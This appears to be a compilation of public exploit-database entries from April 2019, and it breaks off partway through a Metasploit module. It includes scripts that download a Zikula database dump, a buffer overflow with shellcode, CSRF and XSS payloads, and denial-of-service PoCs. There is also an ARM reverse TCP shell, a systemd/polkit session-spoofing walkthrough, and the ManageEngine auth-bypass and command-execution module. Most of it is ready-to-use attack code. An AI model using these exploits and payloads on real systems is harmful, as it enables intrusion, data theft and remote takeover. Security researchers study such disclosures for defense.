###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : Zikula Core CMS 2.0.13 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/04/2019
# Vendor Homepage : ziku.la
# Software Download Link : github.com/zikula/core/releases/download/2.0.13/2.0.zip
# Software Information Link : ziku.la/en/documentation
# Software Version : 2.0 and 2.0.13 - All Lower Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
Zikula Core is an Application Framework which extends Symfony 4.x and includes technologies 

fostering a dynamic modular development paradigm and Twig-based theming system which 

allows for rapid website and application development.

Zikula can quickly become a Content Management System utilizing community-driven modules.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

# Requirements :
****************
Zikula Core requires PHP >= 7.2.0
Additional server considerations can be found on the Symfony site
Zikula requires more memory than typical to install. You should set your 
memory limit in php.ini to 128 MB for the installation process.
Zikula requires that date.timezone be set in the php.ini configuration file (or .htaccess).
Zikula requires AllowOverride All and the mod_rewrite module (be aware the 
Apache 2.3.9+ has changed the default setting for AllowOverride to None).
Zikula also requires other php extensions and configurations. These are checked during 
the installation process and if there are problems, you will be notified. If you 
discover errors, check with your hosting provider on how to rectify these issues.
Typically, they will require changing the php.ini file or possibly reconfiguring 
the php installation by your provider.

###########################################################################

File :
******
/core/test_dbs/core143.sql

/test_dbs/core143.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Nov 05, 2016 at 10:39 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `upgrading143back`

-- Table structure for table `admin_category`

-- Dumping data for table `admin_category`

-- Table structure for table `users`

-- Dumping data for table `users`

File :
******
/test_dbs/core144.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Dec 08, 2016 at 04:56 PM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `144`

File :
******
/test_dbs/core145.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Jan 12, 2017 at 10:00 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `zk14x`

File :
******
/test_dbs/core146.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.4.10
-- phpmyadmin.net
--
-- Host: localhost:3306
-- Generation Time: Apr 01, 2017 at 11:17 AM
-- Server version: 5.5.42
-- PHP Version: 5.5.26
-- Database: `zk14x`

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/test_dbs/core143.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Zikula Core CMS 2.0.13 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="test_dbs/core143.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/test_dbs/core143.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/test_dbs/core143.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

#!/usr/bin/python
# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
# Date: 20-04-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: http://www.labf.com/nfsaxe
# Version: 3.7
# Software Link : http://www.labf.com/download/nfsaxe.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP SP3 ENG x86
# CVE: TBC from Mitre
# PoC:
# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
# 3.) Click Start and calc pops
#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)

shellcode = ("\x31\xC9"
"\x51"
"\x68\x63\x61\x6C\x63"
"\x54"
"\xB8\xC7\x93\xC2\x77"
"\xFF\xD0")                 

buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)

payload = buffer
try:
    f=open("nfsaxeping.txt","w")
    print "[+] Creating %s bytes ping payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Contact Form Builder [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-builder
# Version: 1.0.67
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `ContactFormMakerPreview`
- `ContactFormmakerwdcaptcha`
- `nopriv_ContactFormmakerwdcaptcha`
- `CFMShortcode`

All of them call the function `contact_form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

PoC
---

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=/../../../../../../index">
<label>AJAX action:
<select name="action">
<option
value="ContactFormMakerPreview">ContactFormMakerPreview</option>
<option
value="ContactFormmakerwdcaptcha">ContactFormmakerwdcaptcha</option>
<option
value="nopriv_ContactFormmakerwdcaptcha">nopriv_ContactFormmakerwdcaptcha</option>
<option value="CFMShortcode">CFMShortcode</option>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```

# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
# Date: 19.04.19
# Vendor Homepage:http://www.audiotool.net/download.htm
# Software Link:  http://www.audiotool.net/download/audioconverter.exe
# Exploit Author: Achilles
# Tested Version: 5.30
# Tested on: Windows 7 x64 Sp1

# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
# 3.- Load the file "Evil.mp4"
# 4.- Click ok
# 5.- Click Gut
# 5.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
  f=open("Evil.mp4","w")
  print "[+] Creating %s bytes evil payload.." %len(buffer)
  f.write(buffer)
  f.close()
  print "[+] File created!"
except:
  print "File cannot be created"

<!--
# Exploit Title: Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-memory in invalid table size . Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-04-20
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 73.0.3683.103
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in invalid table size 

# https://bugs.chromium.org/p/chromium/issues/detail?id=918301
-->


<html>
<head>
<script>

var arr1 = [0,1];

function ObjCreate(make) {
  this.make = make;
}

var obj1 = new ObjCreate();

function main() {

  arr1.reduce(f3); 

  Object.getOwnPropertyDescriptors(Array(99).join(obj1.make));

}

function f3() {

  obj1["make"] = RegExp(Array(60000).join("CCC")); 
}

</script>
</head>
<body onload=main()></body>
</html>

Ross Video DashBoard 8.5.1 Insecure Permissions


Vendor: Ross Video Ltd.
Product web page: https://www.rossvideo.com
Affected version: 8.5.1

Summary: DashBoard is a free and open platform from Ross Video for facility
control and monitoring that enables users to quickly build unique, tailored
Custom Panels that make complex operations simple.

Desc: DashBoard suffers from an elevation of privileges vulnerability which
can be used by a simple authenticated user that can change the executable file
with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.

Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5516
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5516.php


23.04.2019

--


C:\DashBoard>icacls DashBoard.exe && cacls DashBoard.exe
DashBoard.exe BUILTIN\Administrators:(I)(F)
              NT AUTHORITY\SYSTEM:(I)(F)
              BUILTIN\Users:(I)(RX)
              NT AUTHORITY\Authenticated Users:(I)(M)

Successfully processed 1 files; Failed processing 0 files
C:\DashBoard\DashBoard.exe BUILTIN\Administrators:(ID)F
                           NT AUTHORITY\SYSTEM:(ID)F
                           BUILTIN\Users:(ID)R
                           NT AUTHORITY\Authenticated Users:(ID)C

/*
* Title:    Linux/ARM - Password-Protected Reverse TCP Shell
* Date:     2019-04-20
* Tested:   armv6 (32-bit Raspberry Pi I)
* Author:   Alan Vivona - @syscall59 - medium.syscall59.com
* Size:     100 bytes
* No null bytes / Null-free
*/

.section .text
.global _start
_start:

.arm
    add   r3, pc, #1 // switch to thumb mode 
    bx    r3

.thumb

// [281] socket(2, 1, 0) 
    mov   r0, #2
    mov   r1, #1
    eor   r2, r2
    mov   r7, #200
    add   r7, #81
    svc   #1
mov   r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen) 
    // socket fd is in r0 already
    adr   r1, target
    strb  r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
    strb  r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
    strb  r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
    mov   r2, #16
    add   r7, #2  // 281 + 2 = 283
    svc   #1

// [003] read(sourcefd, destbuffer, amount)
    push  {r1}
    mov   r1, sp
    mov   r2, #4
    mov   r7, #3
    read_pass:
        mov   r0, r10
        svc   #1
    check_pass:
        ldr   r3, pass
        ldr   r4, [r1]
        eor   r3, r3, r4
    bne read_pass

// [063] dup2(sockfd, stdIO) 
    mov   r1, #2  // r1 = 2 (stderr)
    mov   r7, #63 // r7 = 63 (dup2)
    loop_stdio:
        mov   r0, r10 // r0 = saved sockfd 
        svc   #1
        sub   r1,#1
    bpl loop_stdio    // loop while r3 >= 0 

// [011] execve(command, 0, 0) 
    adr   r0, command
    eor   r2, r2
    eor   r1, r1
    strb  r2, [r0, #7]
    mov   r7, #11 
    svc   #1

// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

target:
    // The 0xff will be replaced with a null on runtime
    .ascii "\x02\xff"   // Protocol: IPv4/TCP. 

    .ascii "\x11\x5c"   // Port : 4444 

    // The '255' will be replaced with a 0 on runtime
    .byte 127,255,255,1 // IP: 127.0.0.1. 

command: .ascii "/bin/sh?"  // The '?' will be replaced with a null on runtime

pass: .ascii "S59!"


/* 
    Compile, link & extract: 

        as ARM-reverse-shell.s -o ARM-reverse-shell.o
        ld -N ARM-reverse-shell.o -o ARM-reverse-shell
        objcopy -O binary ARM-reverse-shell ARM-reverse-shell.dump
        hexdump -v -e '"\\""x" 1/1 "%02x"""' ARM-reverse-shell.dump

        \x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x82\x46\x0e\xa1\x4a
        \x70\x4a\x71\x8a\x71\x10\x22\x02\x37\x01\xdf\x02\xb4\x69\x46\x04\x22\x03\x27\x50\x46\x01\xdf\x0b\x4b
        \x0c\x68\x63\x40\xf9\xd1\x02\x21\x3f\x27\x50\x46\x01\xdf\x01\x39\xfb\xd5\x04\xa0\x52\x40\x49\x40\xc2
        \x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x7f\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x3f\x53\x35\x39\x21

*/

systemd: lack of seat verification in PAM module permits spoofing active session to polkit 

Related CVE Numbers: CVE-2019-3842.


[I am sending this bug report to Ubuntu as requested by systemd at
<https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports>.]

As documented at
<https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html>, for
any action, a polkit policy can specify separate levels of required
authentication based on whether a client is:

 - in an active session on a local console
 - in an inactive session on a local console
 - or neither

This is expressed in the policy using the elements \"allow_any\",
\"allow_inactive\" and \"allow_active\". Very roughly speaking, the idea here is
to give special privileges to processes owned by users that are sitting
physically in front of the machine (or at least, a keyboard and a screen that
are connected to a machine), and restrict processes that e.g. belong to users
that are ssh'ing into a machine.

For example, the ability to refresh the system's package index is restricted
this way using a policy in
/usr/share/polkit-1/actions/org.freedesktop.packagekit.policy:

<action id=\"org.freedesktop.packagekit.system-sources-refresh\">
[...]
<description>Refresh system repositories</description>
[...]
<message>Authentication is required to refresh the system repositories</message>
[...]
<defaults>
<allow_any>auth_admin</allow_any>
<allow_inactive>auth_admin</allow_inactive>
<allow_active>yes</allow_active>
</defaults>
</action>


On systems that use systemd-logind, polkit determines whether a session is
associated with a local console by checking whether systemd-logind is tracking
the session as being associated with a \"seat\". This happens through
polkit_backend_session_monitor_is_session_local() in
polkitbackendsessionmonitor-systemd.c, which calls sd_session_get_seat().
The check whether a session is active works similarly.

systemd-logind is informed about the creation of new sessions by the PAM
module pam_systemd through a systemd message bus call from
pam_sm_open_session() to method_create_session(). The RPC method trusts the
information supplied to it, apart from some consistency checks; that is not
directly a problem, since this RPC method can only be invoked by root.
This means that the PAM module needs to ensure that it doesn't pass incorrect
data to systemd-logind.

Looking at the code in the PAM module, however, you can see that the seat name
of the session and the virtual terminal number come from environment
variables:

        seat = getenv_harder(handle, \"XDG_SEAT\", NULL);
        cvtnr = getenv_harder(handle, \"XDG_VTNR\", NULL);
        type = getenv_harder(handle, \"XDG_SESSION_TYPE\", type_pam);
        class = getenv_harder(handle, \"XDG_SESSION_CLASS\", class_pam);
        desktop = getenv_harder(handle, \"XDG_SESSION_DESKTOP\", desktop_pam);

This is actually documented at
<https://www.freedesktop.org/software/systemd/man/pam_systemd.html#Environment>.

After some fixup logic that is irrelevant here, this data is then passed to
the RPC method.


One quirk of this issue is that a new session is only created if the calling
process is not already part of a session (based on the cgroups it is in,
parsed from procfs). This means that an attacker can't simply ssh into a
machine, set some environment variables, and then invoke a setuid binary that
uses PAM (such as \"su\") because ssh already triggers creation of a session via
PAM. But as it turns out, the systemd PAM module is only invoked for
interactive sessions:

# cat /usr/share/pam-configs/systemd
Name: Register user sessions in the systemd control group hierarchy
Default: yes
Priority: 0
Session-Interactive-Only: yes
Session-Type: Additional
Session:
    optional pam_systemd.so

So, under the following assumptions:

 - we can run commands on the remote machine, e.g. via SSH
 - our account can be used with \"su\" (it has a password and isn't disabled)
 - the machine has no X server running and is currently displaying tty1, with
   a login prompt

we can have our actions checked against the \"allow_active\" policies instead of
the \"allow_any\" policies as follows:

 - SSH into the machine
 - use \"at\" to schedule a job in one minute that does the following:
   * wipe the environment
   * set XDG_SEAT=seat0 and XDG_VTNR=1
   * use \"expect\" to run \"su -c {...} {our_username}\" and enter our user's
     password
   * in the shell invoked by \"su\", perform the action we want to run under the
     \"allow_active\" policy


I tested this in a Debian 10 VM, as follows (\"{{{...}}}\" have been replaced),
after ensuring that no sessions are active and the VM's screen is showing the
login prompt on tty1; all following commands are executed over SSH:


=====================================================================
normal_user@deb10:~$ cat session_outer.sh 
#!/bin/sh
echo \"===== OUTER TESTING PKCON\">/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log
env -i /home/normal_user/session_middle.sh
normal_user@deb10:~$ cat session_middle.sh 
#!/bin/sh
export XDG_SEAT=seat0
export XDG_VTNR=1

echo \"===== ENV DUMP =====\"> /tmp/atjob.log
env >> /tmp/atjob.log

echo \"===== SESSION_OUTER =====\">> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log

echo \"===== OUTER LOGIN STATE =====\">> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log

echo \"===== MIDDLE TESTING PKCON\">>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log

/home/normal_user/runsu.expect

echo \"=========================\">> /tmp/atjob.log
normal_user@deb10:~$ cat runsu.expect 
#!/usr/bin/expect
spawn /bin/su -c \"/home/normal_user/session_inner.sh\" normal_user
expect \"Password: \"
send \"{{{PASSWORD}}}\
\"
expect eof

normal_user@deb10:~$ cat session_inner.sh 
#!/bin/sh
echo \"===== INNER LOGIN STATE =====\">> /tmp/atjob.log
loginctl --no-ask-password >> /tmp/atjob.log

echo \"===== SESSION_INNER =====\">> /tmp/atjob.log
cat /proc/self/cgroup >> /tmp/atjob.log

echo \"===== INNER TESTING PKCON\">>/tmp/atjob.log
pkcon refresh -p </dev/null >>/tmp/atjob.log

normal_user@deb10:~$ loginctl
SESSION  UID USER        SEAT TTY  
      7 1001 normal_user      pts/0

1 sessions listed.
normal_user@deb10:~$ pkcon refresh -p </dev/null
Transaction:\tRefreshing cache
Status: \tWaiting in queue
Status: \tWaiting for authentication
Status: \tFinished
Results:
Fatal error: Failed to obtain authentication.
normal_user@deb10:~$ at -f /home/normal_user/session_outer.sh {{{TIME}}}
warning: commands will be executed using /bin/sh
job 25 at {{{TIME}}}
{{{ wait here until specified time has been reached, plus time for the job to finish running}}}
normal_user@deb10:~$ cat /tmp/atjob.log 
===== ENV DUMP =====
XDG_SEAT=seat0
XDG_VTNR=1
PWD=/home/normal_user
===== SESSION_OUTER =====
10:memory:/system.slice/atd.service
9:freezer:/
8:pids:/system.slice/atd.service
7:perf_event:/
6:devices:/system.slice/atd.service
5:net_cls,net_prio:/
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=systemd:/system.slice/atd.service
0::/system.slice/atd.service
===== OUTER LOGIN STATE =====
SESSION  UID USER        SEAT TTY  
      7 1001 normal_user      pts/0

1 sessions listed.
===== MIDDLE TESTING PKCON
Transaction:\tRefreshing cache
Status: \tWaiting in queue
Status: \tWaiting for authentication
Status: \tFinished
Results:
Fatal error: Failed to obtain authentication.
===== INNER LOGIN STATE =====
SESSION  UID USER        SEAT  TTY  
     18 1001 normal_user seat0 pts/1
      7 1001 normal_user       pts/0

2 sessions listed.
===== SESSION_INNER =====
10:memory:/user.slice/user-1001.slice/session-18.scope
9:freezer:/
8:pids:/user.slice/user-1001.slice/session-18.scope
7:perf_event:/
6:devices:/user.slice
5:net_cls,net_prio:/
4:cpuset:/
3:blkio:/
2:cpu,cpuacct:/
1:name=systemd:/user.slice/user-1001.slice/session-18.scope
0::/user.slice/user-1001.slice/session-18.scope
===== INNER TESTING PKCON
Transaction:\tRefreshing cache
Status: \tWaiting in queue
Status: \tWaiting for authentication
Status: \tWaiting in queue
Status: \tStarting
Status: \tLoading cache
Percentage:\t0
Percentage:\t50
Percentage:\t100
Percentage:\t0
Percentage:\t50
Percentage:\t100
Status: \tRefreshing software list
Status: \tDownloading packages
Percentage:\t0
Status: \tRunning
Status: \tLoading cache
Percentage:\t100
Status: \tFinished
Results:
 Enabled                              http://ftp.ch.debian.org/debian buster InRelease
 Enabled                              http://security.debian.org/debian-security buster/updates InRelease
 Enabled                              http://debug.mirrors.debian.org/debian-debug buster-debug InRelease
=========================
You have new mail in /var/mail/normal_user
normal_user@deb10:~$ 
=====================================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Found by: jannh@google.com

# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information

# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: https://www.msvodx.com/
# Version: v10
# CVE : CVE-2019-11375



Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.



<!--poc.html(change user infomation)-->

<!DOCTYPE html>

<html>

<head>

<title> CSRF Proof</title>

<script type="text/javascript">

    function exec1(){

      document.getElementById('form1').submit();

    }

</script>

</head>

<body onload="exec1();">

<form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">

<input type="hidden" name="username" value="hacker1" />

<input type="hidden" name="nickname" value="hacker1" />

<input type="hidden" name="email" value="hacker1" />

<input type="hidden" name="tel" value="hacker1" />

<input type="hidden" name="password" value="hacker1" />

<input type="hidden" name="out_time" value="1970-01-01" />  

<input type="hidden" name="money" value="30" />

<input type="hidden" name="is_permanent" value="0" />

<input type="hidden" name="status" value="1" />

<input type="hidden" name="id" value="821" />

</form>

</body>

</html>

MISC:http://www.iwantacve.cn/index.php/archives/198/

# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398

### Vulnerability 1

Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 2

Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)

Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>

### Vulnerability 3 - Authenticated

Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
Request Type: GET
Vulnerable Parameter : "error"
Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E

### History
=============
2019-04-13  Issue discovered
2019-04-13  Vendor contacted
2019-04-13  Vendor response and hotfix
2019-04-14  Vendor releases fixed versions
2019-04-22  Advisory release

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
'Name'           => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
'Description'    => %q(
        This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
        It is completely different from the previous EDB-ID:46725 exploit.

        Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
        Therefore an unauthenticated user can gain the authority of "system" on the server. 
        It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.

        Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
                Applications Manager 14 on Windows 10 64-bit (MSSQL)
                Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
                Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
                Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
      ),
'License'        => MSF_LICENSE,
'Author'         =>
        [
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
        ],
'References'     =>
        [
          [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
        ],
'DefaultOptions' =>
        {
'WfsDelay' => 60, # countermeasure
'RPORT' => 8443,
'SSL' => true
        },
'Privileged'     => true,
'Payload'        =>
        {
'DisableNops' => true,
        },
'Platform'       => ['unix', 'win', 'linux'],
'Targets' =>
        [
          [ 'Windows Target',
            {
'Platform' => ['win'],
'Arch' => ARCH_CMD,
            }
          ],
          [ 'Linux Target',
            {
'Platform' => ['unix','linux'],
'Arch' => ARCH_CMD,
'Payload' =>
                {
'Compat' =>
                    {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python',
                    }
                }
            }
          ]
        ],
'DisclosureDate' => '22 April 2019',
'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path of ME', '/'])
      ],self.class)
  end

  def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end

  def print_status(msg='')
    super("#{peer} - #{msg}")
  end

  def print_error(msg='')
    super("#{peer} - #{msg}")
  end

  def print_good(msg='')
    super("#{peer} - #{msg}")
  end

  def exec(action)
    # operation of malicious file. The end of the adventure :(
    send_request_cgi(
'method'  => 'GET',
'uri'     =>  normalize_uri(target_uri.path, 'common', 'executeScript.do'),
'cookie'  => @cookie,
'vars_get' => {
'method' => 'testAction',
'actionID' => action,
'haid' => 'null'
      }
    )
  end
##
# platform check
##
  def check_platform
    # First touch to support of execute program ;)
    res = send_request_cgi(
'method'  => 'GET',
'uri'     =>  normalize_uri(target_uri.path, 'showTile.do'),
'cookie'  => @cookie,
'vars_get' => {
'TileName' => '.ExecProg',
'haid' => 'null',
      }
    )
    if res && res.code == 200 && res.body.include?('createExecProgAction')
      # Platform can be discovered precisely using an application dir.
      @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
      if @dir =~ /:/
        platform = Msf::Module::Platform::Windows
      else 
        platform = Msf::Module::Platform::Unix
      end
    else
      fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
    end
    file_up(platform, @dir)
  end
##
# Creating and sending malicious files
##
  def file_up(platform, dir)
    # specifying an extension by platform
    if platform == Msf::Module::Platform::Windows
      filex = ".bat"
    else
      if payload.encoded =~ /sh/
        filex = ".sh"
      elsif payload.encoded =~ /perl/
        filex = ".pl"
      elsif payload.encoded =~ /python/
        filex = ".py"
      elsif payload.encoded =~ /ruby/
        filex = ".rb"
      else
        fail_with(Failure::Unknown, 'Payload type could not be checked!')
      end
    end

    @fname= rand_text_alpha(9 + rand(3)) + filex
    data = Rex::MIME::Message.new
    data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")

    res = send_request_cgi({
'method' => 'POST',    
'data'  => data.to_s,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => @cookie,
'uri' => normalize_uri(target_uri, "Upload.do")     
    })

    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
      print_good("#{@fname} malicious file has been uploaded.")
      create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
    else
      fail_with(Failure::Unknown, 'The file could not be uploaded!')
    end
  end

  def create_exec_prog(dir, fname)

    @display = rand_text_alphanumeric(7)
    res = send_request_cgi(
'method'  => 'POST',
'uri'     =>  normalize_uri(target_uri.path, 'adminAction.do'),
'cookie'  => @cookie,
'vars_post' => {
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
'method' => 'createExecProgAction',
'id' => 0,
'displayname' => @display,
'serversite' => 'local',
'choosehost' => -2,
'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
'command' => fname,
'execProgExecDir' => dir,
'cancel' => 'false'
      }
    )

    if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
      # Find actionID simply from body res
      actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0] 
      print_status("Transactions completed. Attempting to get a session...")
      exec(actionid)
    else
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end

  end
##
# Check all
##
  def check
